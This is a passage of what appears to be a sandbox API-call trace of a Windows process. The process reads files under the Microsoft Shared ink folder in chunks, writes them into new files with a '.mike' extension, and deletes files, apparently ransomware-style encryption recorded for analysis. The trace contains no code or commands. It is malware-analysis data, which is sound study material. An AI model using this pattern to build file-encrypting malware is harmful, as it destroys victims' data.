Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0044.431] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ac2940, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4ac2940, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4ae8aa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e20)) returned 1 [0044.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0044.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike", lpFilePart=0x0) returned 0x4e [0044.431] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.mike")) returned 1 [0044.433] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.433] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.433] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.435] GetFileType (hFile=0x264) returned 0x1 [0044.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.435] GetFileType (hFile=0x264) returned 0x1 [0044.435] CloseHandle (hObject=0x264) returned 1 [0044.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.435] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.436] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.436] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), fInfoLevelId=0x0, lpFileInformation=0x217d074 | out: lpFileInformation=0x217d074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200)) returned 1 [0044.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.436] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.436] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), fInfoLevelId=0x0, lpFileInformation=0x217d394 | out: lpFileInformation=0x217d394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200)) returned 1 [0044.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.436] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.436] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.436] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.436] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.437] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.437] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.437] GetFileType (hFile=0x264) returned 0x1 [0044.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.437] GetFileType (hFile=0x264) returned 0x1 [0044.437] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.438] WriteFile (in: hFile=0x264, lpBuffer=0x217e228*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x217e228*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.438] CloseHandle (hObject=0x264) returned 1 [0044.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.439] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), fInfoLevelId=0x0, lpFileInformation=0x217dd20 | out: lpFileInformation=0x217dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200)) returned 1 [0044.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.439] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.439] GetFileType (hFile=0x264) returned 0x1 [0044.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.439] GetFileType (hFile=0x264) returned 0x1 [0044.439] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.439] ReadFile (in: hFile=0x264, lpBuffer=0x217f358, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x217f358*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.479] CloseHandle (hObject=0x264) returned 1 [0044.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.480] GetFileType (hFile=0x264) returned 0x1 [0044.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.480] GetFileType (hFile=0x264) returned 0x1 [0044.480] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0044.480] WriteFile (in: hFile=0x264, lpBuffer=0x21898c0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21898c0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.480] CloseHandle (hObject=0x264) returned 1 [0044.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.482] GetFileType (hFile=0x264) returned 0x1 [0044.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.482] GetFileType (hFile=0x264) returned 0x1 [0044.482] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0044.482] ReadFile (in: hFile=0x264, lpBuffer=0x218c328, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x218c328*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.482] CloseHandle (hObject=0x264) returned 1 [0044.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.483] GetFileType (hFile=0x264) returned 0x1 [0044.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.483] GetFileType (hFile=0x264) returned 0x1 [0044.483] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0044.483] WriteFile (in: hFile=0x264, lpBuffer=0x2196890*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2196890*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.484] CloseHandle (hObject=0x264) returned 1 [0044.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.485] GetFileType (hFile=0x264) returned 0x1 [0044.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.485] GetFileType (hFile=0x264) returned 0x1 [0044.485] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0044.485] ReadFile (in: hFile=0x264, lpBuffer=0x21992f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21992f8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.485] CloseHandle (hObject=0x264) returned 1 [0044.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.486] GetFileType (hFile=0x264) returned 0x1 [0044.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.486] GetFileType (hFile=0x264) returned 0x1 [0044.486] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0044.486] WriteFile (in: hFile=0x264, lpBuffer=0x21a3860*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21a3860*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.486] CloseHandle (hObject=0x264) returned 1 [0044.487] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.487] GetFileType (hFile=0x264) returned 0x1 [0044.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.487] GetFileType (hFile=0x264) returned 0x1 [0044.487] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0044.487] ReadFile (in: hFile=0x264, lpBuffer=0x21a62c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21a62c8*, lpNumberOfBytesRead=0x2af080*=0xa00, lpOverlapped=0x0) returned 1 [0044.487] CloseHandle (hObject=0x264) returned 1 [0044.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.488] GetFileType (hFile=0x264) returned 0x1 [0044.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.488] GetFileType (hFile=0x264) returned 0x1 [0044.488] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0044.488] WriteFile (in: hFile=0x264, lpBuffer=0x21ab974*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21ab974*, lpNumberOfBytesWritten=0x2af074*=0xa00, lpOverlapped=0x0) returned 1 [0044.489] CloseHandle (hObject=0x264) returned 1 [0044.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0044.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.490] GetFileType (hFile=0x264) returned 0x1 [0044.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0044.490] GetFileType (hFile=0x264) returned 0x1 [0044.491] WriteFile (in: hFile=0x264, lpBuffer=0x21aeba4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21aeba4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0044.491] CloseHandle (hObject=0x264) returned 1 [0044.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program 